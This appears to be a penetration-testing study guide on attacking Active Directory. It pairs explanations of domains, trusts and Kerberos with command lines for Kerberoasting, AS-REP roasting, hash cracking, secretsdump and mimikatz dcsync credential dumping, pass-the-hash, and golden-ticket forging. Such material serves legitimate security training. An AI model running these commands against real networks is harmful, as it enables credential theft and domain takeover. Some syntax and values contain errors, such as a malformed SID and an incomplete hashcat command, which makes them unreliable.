ATTACKING ACTIVE DIRECTORY OSCP (Offensive Security Certified Professional) PNPT (TCM Security — Practical Network Penetration Tester) CRTO (Zero Point Security Certified Red Team Operator) CRTP (PenTest Academy Certified Red Team Professional) CHMRS (CyberWarFare Hybrid Multi-Cloud Red Team Specialist) What Is Active Directory INDEX OF CONTENT ● ● ● ● ● ● ● ● ● ACTIVE DIRECTORY Enumerating Active Directory What Is Kerberos Kerberos Brute Fource Kerberoasting AS-REP Roasting Golden/Silver Ticket Attacks Pass the Ticket Active Directory Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks. It is a crucial component in many Windows environments and provides a centralized system for managing and organizing information about network resources and users, including devices, users, and groups. The primary purpose of Active Directory is to provide authentication and authorization services in a Windows environment. ACTIVE DIRECTORY Active Directory simplifies the management of network resources, enhances security through centralized authentication and authorization, and provides a structured way to organize and administer large-scale network environments. While it is closely associated with Windows environments, there are also mechanisms, like LDAP, that allow integration with non-Windows systems. Enumerating Active Directory Enumerating Active Directory ENUMERATING Domains : In Active Directory network, commonly referred to as a Domain, is a collection of interconnected computers that share an Active Directory database. This database is overseen by central servers known as Domain Controllers. The Domain servers as a structured environment for managing and organizing information about users, computers, and network resources, providing centralized control over authentication, authorization, and other network-related services. Domain name Enum using powershell : [Identify current user domain from Powershell ]: $env:USERDNSDOMAIN (Get-ADDomain).DNSRoot [Get DNS name, NetBIOS name and SID of domain ]: Get-ADDomain | select DNSRoot,NetBIOSName,DomainSID Each domain in Active Directory has a DNS name and can also be recognized by a NetBIOS name, such as example for the domain examble.local. The NetBIOS name is visible in login operations, like examble\Administrator. Additionally, a domain is identified by its SID (Security Identifier) powershell WHAT IS THE TREE AND FOREST IN ACTIVE DIRECTORY TREE : Definition: A tree in Active Directory is a collection of one or more domains that share a contiguous namespace and are linked in a hierarchical structure. Hierarchy: The domains in a tree are arranged in a parent-child relationship, forming a hierarchy. Each domain in the tree has a trust relationship with the parent and child domains Example: If you have a domain called example.local and create a new domain called sales.example.local, the two domains together form a tree. The root of the tree is the original domain (example.local), and the new domain (sales.example.local) is a child of the root. example.local (Root Domain) / \ sales.example.local it.example.local (Child Domains) | finance.sales.example.local (Subdomain) FOREST: ● Definition: A forest in Active Directory is a collection of one or more trees that do not necessarily share contiguous namespaces but are connected by trust relationships. ● Trust Relationships: Domains within the same tree inherently trust each other due to the hierarchical structure. In a forest, trust relationships are established between the root domains of different trees ● Example: If you have two trees, one with the domain example1.local and another with example2.local, and they are connected by a trust relationship, they together form a forest. Each tree is an independent entity, but they share a common security boundary within the forest example1.local / | \ sales hr finance example2.local / \ \ it sales marketing FOREST ENUM using Powershell: Forest information with Get-ADForest Expected output : Get-ADForest Windows2000:Basic functional mode compatible with Windows 2000 Server. Active Directory domains and forests in Windows environments have different "functional modes" that determine the features and capabilities they support. The functional modes are named based on the minimum required Windows Server operating system. Here are the available functional modes (Get-ADForest).ForestMode (Get-ADDomain).DomainMode Windows2000MixedDomains: Supports a mix of Windows 2000 Server and Windows Server 2003 domain controllers. Windows2003: Active Directory Trusts In Active Directory, a trust is a directed relationship between domains, establishing a secure link for resource access. The trusting domain grants users from the trusted domain access to its resources. Trust direction is opposite to access direction, ensuring controlled and secure collaboration. It's analogous to trusting a friend to access your house and food when needed. Trusts enhance network functionality and facilitate resource sharing in a structured manner. (trusting) trusts (trusted) Domain A --------------------> Domain B outgoing incoming outbound inbound access <-------------------- TRUST ENUM WITH POWERSHELL The trusts of your domain can be viewed using the command : nltest /domain_trusts. This command provides information about the trust relationships established with other domains in the Active Directory environment. Users user management is a critical aspect of Active Directory and plays a central role in organizational security and efficiency. Here's a brief summary: Active Directory is essential for effective user management in organizations. It allows customization of user attributes, such as name formats and permissions, catering to the specific needs of each organization. This centralized user management system ensures consistent and secure access to resources, facilitating efficient administration and enhancing overall organizational productivity. User Enum using Powershell User Identifiers : Get-ADUser <username> in Active Directory, user identification primarily relies on the SamAccountName attribute, representing the username. Additionally, the SID (Security Identifier) serves as a unique identifier, composed of the domain SID combined with the user's RID (Relative Identifier). The RID is the last number in the user SID, contributing to its distinctiveness within the domain. These attributes play a crucial role in user identification and authentication in the Active Directory environment. Expected Output AhmadN: DistinguishedName : CN=John Doe,CN=Users,DC=example,DC=com Enabled : True GivenName : Ahmad Surname :N SamAccountName : Ahmad.N UserPrincipalName :Ahmad@example.com SID : S-1-5-21-123456789-987654321-123456789-1001 EmailAddress :Ahmad.N@example.com DUMP THE DOMAIN DATABASE : In Active Directory, user secrets, including the password, are not stored in plaintext. Instead, derived secrets such as NT hash (and LM hash for older accounts) and Kerberos keys are saved. These secrets are essential for Domain Controllers to authenticate users. Importantly, regular users and even domain computers cannot access these secrets; authentication is exclusively managed by the Domain Controller. Admin privileges, or equivalent access, are required to retrieve user secrets, typically through methods like a dcsync attack or obtaining the ntds.dit file from the Domain Controller's system directory. This emphasizes the robust security measures in place to protect user authentication information in Active Directory. Note : we will cover the attack in next modules EXAMPLE OF DUMPING THE DATABASE : Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d1 6ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae93 1b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0 d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:653 5b87abdb112a8fc3bf92528ac01f6::: user:1001:aad3b435b51404eeaad3b435b51404ee:57d583aa46d5715 02aad4bb7aea09c70::: User Enum Important Users To consult the users there are several options, like the net user /domain command, or Powershell. There is no need to have an special privilege to list users, any user can do it. Get-ADUser -Filter * | select SamAccountName This PowerShell command retrieves all user accounts (-Filter *) and then selects and displays the SamAccountName property for each user. Computer Account Enum Computer accounts are not stored as instances of the User class in Active Directory; rather, they are stored as instances of the Computer class. Both User and Computer classes are subclasses of the generic class called Person. The difference between user accounts and computer accounts is that user accounts are stored as instances of the User class in the database, while computer Accounts are stored as instances of the Computer class (which is a subclass of the Person class). Moreover, computer account names are the computer hostname followed by a dollar sign $. Get-ADObject -LDAPFilter "objectClass=User" -Properties SamAccountName | Select-Object SamAccountName This command retrieves Active Directory objects where the objectClass is User and displays their SamAccountName properties. It's important to note that computer accounts would not be included in the result of this specific query due to the filter specifying User objects. Enumerating Groups Effectively managing user access becomes more efficient and scalable with the use of groups in Active Directory. For instance, for a department like managers requiring access to sensitive documents, creating a "Manager" group and assigning permissions simplifies administration. When policy changes occur, adjustments are made to group permissions rather than individual users. This ensures streamlined management, especially as the organization grows. Groups, identified by attributes like SamAccountName or SID, are stored in the domain database. Querying the database allows administrators to list groups and their members, providing transparency into access control structures. Get-ADGroup -Filter * | select SamAccountName Expected output : KERBEROS KEYS ENUM WITH secretdump Kerberos keys, derived from user passwords, are stored for Kerberos authentication. These keys enable the issuance of Kerberos tickets, representing the user during authentication. Various keys exist, each tailored for different encryption support within the Kerberos Protocol. This Multi-key Approach Enhances Security And Flexibility in Supporting Diverse Encryption methods During Authentication processes. Kerberos keys extracted from the domain database Secretsdump.py examble.local/Administrator@192.168.100.2' -just-dc-user Ahmad ● secretsdump.py is the script used for extracting various secrets from Windows systems. ● 'example.local/Administrator@192.168.100.2' specifies the target domain (example.local), the username (Administrator), and the IP address of the Domain Controller (192.168.100.2). ● -just-dc-user th indicates that the tool should only retrieve information about the specified user (Ahmad) from the Domain Controller. enum4linux enum4linux is a tool used for extracting information from Windows systems during the enumeration phase of a penetration test or security assessment. It is particularly focused on gathering information from Windows systems that are part of a network using the Server Message Block (SMB) protocol. 1. 2. 3. 4. 5. 6. Usernames Shares Password Policy Groups System Information Session Information KERBEROS Kerberos Kerberos is a network authentication protocol that provides a secure means for authenticating users and services in a network environment. Developed at MIT, Kerberos is widely used in various systems, including Microsoft Windows Active Directory. Key features of the Kerberos protocol include: 1. 2. 3. 4. 5. 6. Authentication: Kerberos provides a strong authentication mechanism, allowing users and services to prove their identity to each other across a non-secure network. Single Sign-On (SSO): Once a user authenticates to the Kerberos system, they can access multiple services without re-entering their credentials. This enhances user convenience and simplifies management. Ticketing System: Kerberos uses tickets to authenticate users. When a user logs in, they receive a ticket granting ticket (TGT). This TGT can be used to obtain service tickets for accessing specific services within the network. Mutual Authentication: Both the user and the server mutually authenticate each other, ensuring that both parties are who they claim to be. Security: Kerberos employs strong encryption to protect the authentication process and communication between clients and servers, reducing the risk of eavesdropping and unauthorized access. Time Sensitivity: Tickets issued by Kerberos have a limited validity period, enhancing security by reducing the risk of replay attacks. Kerberos Brute Force Since Kerberos is an authentication protocol, it can be used to test the credentials of the users in the network. Furthermore, Kerberos errors are very verbose and allow to distinguish a plenty of situations in a bruteforcing attack: ● ● ● ● KDC_ERR_PREAUTH_FAILED: Incorrect password KDC_ERR_C_PRINCIPAL_UNKNOWN: Invalid username KDC_ERR_WRONG_REALM: Invalid domain KDC_ERR_CLIENT_REVOKED: Disabled/Blocked user By checking the error messages, you not only can test for valid credentials, but also enumerate user accounts and be aware if your attack has blocked some account. Be careful by launching this kind of attacks!! Sending AS-REQ to kdc with user wordlist to enumerate valid users ] ./kerbrute_linux_amd64 userenum --dc=10.10.6.165 -d=examble.local. Wordlist.txt Kerberoasting Kerberoasting Kerberoasting is one of the most popular attacks. Kerberoasting allows a user to request a service ticket for any service with a registered SPN then use that ticket to crack the service password. If the service has a registered SPN then it can be kerberoastable, however the strength of the password on the account can limit results. To enumerate Kerberoastable accounts I would suggest using a tool like Bloodhound, it will let you see what kind of accounts you can Kerberoast if they are domain admins, and what kind of connections they have to the rest of the domain. Kerberoasting Kerberoasting RUBEUS Kerberoasting Impacket ith Rubeus kerberoast This will dump the Kerberos hash of any Kerberoastable users python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip This will dump the Kerberos hashes much like Rubeus, but unlike Rubues (which only runs locally on the target machine), Impacket can be used remotely. Example OutPut You can crack the hashes using hashcat : $krb5tgs$23$*user$realm$test/spn*$ 63386d22d359fe42230300d56852c9 eb$891ad31d09ab89c6b3b8c5e5de 6c06a7f49fd559d7a9a3c32576c8fedf 705376cea582ab5938f7fc8bc741acf 05c5990741b36ef4311fe3562a41b7 0a4ec6ecba849905f2385bb3799d92 499909658c7287c49160276bca0006 c350b0db4fd387adc27c01e9e9ad0c 20ed53a7e6356dee2452e35eca2a6 a1d1432796fc5c19d068978df74d3d 0baf35c77de12456bf1144b6a750d1 1f55805f5a16ece2975246e2d026dc e997fba34ac8757312e9e4e6272de3 5e20d52fb668c5ed hashcat --force -m 13100 -a hash.txt passwordlist.txt ASReproast ASReproast Attack Theory Kerberos Pre-authentication: In the usual process, when a user wants to access a service, they send a request (AS-REQ) to the Key Distribution Center (KDC) along with a timestamp encrypted with their Kerberos key. Disabling Pre-authentication: In the usual process, when a user wants to access a service, they send a request (AS-REQ) to the Key Distribution Center (KDC) along with a timestamp encrypted with their Kerberos key Disabling Pre-authentication: Sometimes, the requirement for pre-authentication is disabled for certain user accounts by setting the DONT_REQUIRE_PREAUTH flag. This means that a user can request a Ticket Granting Ticket (TGT) without providing the usual timestamp. . Vulnerability - ASREProast Attack: If pre-authentication is disabled for an account, anyone can impersonate that account by sending an AS-REQ message to the KDC. The KDC will respond with an AS-REP message containing data encrypted with the user's Kerberos key. ASReproast Attack Theory Exploiting ASREProast Attack: ASREProast attack involves identifying users without pre-authentication, then sending an AS-REQ on their behalf. The goal is to retrieve the piece of data encrypted with the user key in the AS-REP message. Offline Cracking Attack: The AS-REP data is encrypted with the user's key, which is derived from their password. Although you can't access the data directly, an offline cracking attack is attempted to discover the user's password. ASReproast REMOTE ASREPROATING : On the network : python3 GetNPUsers.py -no-pass -usersfile /home/katana/Desktop/scripts/valied.txt -dc-ip 10.10.136.71 CONTROL.local/ Rubeus.exe asreproast Hash example : $krb5asrep$23$han@CONTOSO.LOCAL:73eea4275625972c2e224648c4766b5a$1bbdaba56bb6eba4ea8cb565221de2fe2b5 a8ade3d1155e33aa4d786624b84a62a100d97412361c851dfbf3d95ce3d047916bc66ddcec557f70b232a1d029f6a889e49e350 69494b43e4b00b892d4ccc4d31e0c4970e8aff426eaa6821133e9a2bbef017ef9241c95d0098bfea4fd2b3c2919e1247de05d19db 59fec46a81a60f0f89a2d9c105b9e00011387e756cb284b0ba785655526e3ba6c51f3b8eba21e674d4f1b4e93025f9cf0dccb1f86c 3247f0b9ebfc663be5510faf2b77d932351ac4899cb77be58271dc01a3304bfd1de6216e04e5d9033859b92fa87438863c2dff112 237c2ace8cffbc2dbb57c6 Crack the hash and extract cred hashcat --force -m 18200 -a 0 hash.txt passwordlist.txt fter we obtain the credentials, we can gain access to the following remote service FTP SSH xfreerdp /v:ipvic /u:username smbclient -L \\ip_address\ -U username smbclient //ip_address/share -U username ssh username@ip SMB RPC f Access the accounts Pass the hash One common approach, frequently employed by various tools such as PsExec, impacket's psexec.py, wmiexec.py, and similar *exec.py examples, involves utilizing Remote Procedure Call (RPC) in conjunction with Server Message Block (SMB). In this method, these tools execute commands through an RPC interface and transmit/receive input/output via SMB pipes. Typically, only port 445 (SMB) needs to be open for command execution, but certain tools like wmiexec.py may also require port 135 (RPC over TCP). Furthermore, these tools have the capability to perform Pass-The-Hash attacks using the NT or LM hash. In the case of impacket tools, there's a parameter allowing direct use of the NT or LM hash. However, for PsExec, integration of the NT hash into the Windows session using mimikatz is necessary to achieve the same result PASS THE HASH ATTACK Psexec.py domain/name@ip -hashes :cdeae556dc28c24b5b7b14e9df5b6e21 EXTRACT THE HASHES: secretsdump.py -just-dc backup@10.10.111.231 OR USEING EVIL-WINRM evil-winrm -i <target ip> -u Administrator -H 0e0363213e37b94221497260b0bcb4fc Here we have access to these accounts Golden Ticket Attack The Golden Ticket attack is a method used to illicitly access computer systems as a privileged user by forging a Kerberos ticket. In order to execute this attack, the perpetrator must acquire the NTLM hash of the krbtgt account, which is responsible for encrypting and signing all tickets within a domain. Additionally, knowledge of the domain's Security Identifier (SID) is required. Armed with this information, the attacker can fabricate a deceptive golden ticket that closely resembles a legitimate ticket issued by the domain's authentication server. This fraudulent golden ticket grants the attacker unauthorized access to sensitive information and resources on the targeted system. Tools and methods employed to carry out a Golden Ticket Attack In this scenario, we will assume that upon performing a Kerberoasting attack, an attacker [Impacket] dumped a file of hashes and cracked them to gain administrator access to the Domain Controller. In other words, we have the plaintext password of an administrator user that can Access the DC. In addition, our domain name will be EXAMPLE.local for efficiency. Step 1: Creating a Counterfeit Golden Ticket To generate a legitimate golden ticket, specific details are necessary, including the NTHash of the krbtgt account on the domain controller and the domain SID. This data can be acquired using the secretsdump.py script from Impacket, assuming the attacker possesses administrator privileges on the domain controller. The correct syntax for extracting the NTHash of the krbtgt account is provided below: secretdump.py Administrator:"Password"@<DC_IP_Address> Continuing the process, the attacker must ascertain the domain SID. To achieve this, Impacket's lookupsid.py tool can be employed. It's important to highlight that although the attacker designates the domain controller (DC) as the target, this method is effective with any domain controller. lookupsid.py EXAMPLE.local/Administrator:"Password"@<DC_IP_Address> In the last step, the attacker utilizes Impacket's ticketer.py tool to craft a golden ticket for a specific domain user. An advantageous feature of ticketer.py is that the forged ticket is saved in a .ccache file rather than .kirbi. This means the attacker is spared the additional step of converting the ticket. ticketer.py -nthash bf106a6860c6f7b3317c653a38aba33 -domain-sid "S-5-1-5-21-2049251289-867822404-1193079966" -domain EXAMPLE.local Alice Step 2: Using a golden ticket To prepare the golden ticket for activation, it's necessary to configure the KRB5CCNAME environment variable by setting it to the path of the .ccache file. This file path can be specified as either an absolute or relative path. The KRB5CCNAME environment variable serves the purpose of directing Impacket tools, which support Kerberos tickets, to the location of the ticket. This step enables the attacker to utilize the golden ticket to gain access to the system with privileged user privileges. Subsequently, the attacker can employ Impacket's command execution tools, such as psexec.py, smbexec.py, or wmiexec.py, to load and authenticate with the golden ticket, ultimately providing the adversary with command execution capabilities. For successful Kerberos authentication, the attacker must furnish essential information, including the IP address of the target system, the IP address of the Domain Controller, and the domain name. psexec.py $EXAMPLE.local/$Administrator@$TARGET_NAME -target-ip $TARGET_IP -dc-ip $DC_IP -no-pass -k Tools and methods employed to carry out a Golden Ticket Attack Mimikatz Mimikatz is a powerful and widely-known post-exploitation tool that is designed to extract sensitive information from Windows systems, particularly in the context of credential theft and manipulation. Developed by Benjamin Delpy, Mimikatz has been used for both legitimate security purposes (such as penetration testing and assessing system vulnerabilities) and malicious activities (like cyberattacks and unauthorized access). Step 1 :Exploiting the security of the password hash for the krbtgt account Similar to the Impacket scenario, in the context of a Golden Ticket attack, it is assumed that the adversary already possesses administrator access to a Domain Controller. With this assumption in place, the next step involves exfiltrating the password hash of the krbtgt user, and the attacker can achieve this by utilizing the "lsadump::dcsync" command. PS> mimikatz.exe "lsadump::dcsync /user:DOMAIN\KRBTGT" Step 2 : Creating Fraudulent Kerberos tickets To fabricate a Ticket Granting Ticket (TGT), the attacker must provide specific details to the Mimikatz kerberos::golden function. This includes the domain's fully qualified domain name, the Security Identifier (SID) of the domain, the password hash of the KRBTGT user (utilizing AES-256, and optionally AES-128, NTLM, or RC4), the username to be impersonated, the Relative Identifier (RID) of groups to be included in the ticket (with the first being the primary group of the user), and the "ptt" flag. The "ptt" flag indicates whether the forged ticket should be injected into the current session instead of being saved to a file. PS> mimikatz.exe "kerberos::golden /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /aes256:ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 /id:500 /user:NonExistentAdministator /groups:GroupNumber1, GroupNumber2 /ptt Step 3: Leveraging the Forged Kerberos Ticket Once the attacker has successfully forged a Ticket Granting Ticket (TGT), they can leverage it to access resources integrated with Kerberos. The TGT is signed and encrypted with the actual KRBTGT password hash, making it a legitimate proof of identity in the eyes of any domain controller. Subsequently, the domain controller will issue Ticket-Granting Service (TGS) tickets based on the TGT. As the attacker acquires more information about the environment, they can employ the forged tickets to gain entry to applications, databases, or other resources utilizing Active Directory for authentication and authorization. The attacker may selectively target specific groups by including their Relative Identifier (RID) in the ticket-forging process. For example, during a discovery phase, they might identify a group such as "MSSQL Administrators" along with its corresponding RID. This targeted approach could potentially grant the attacker access to valuable databases and sensitive information .
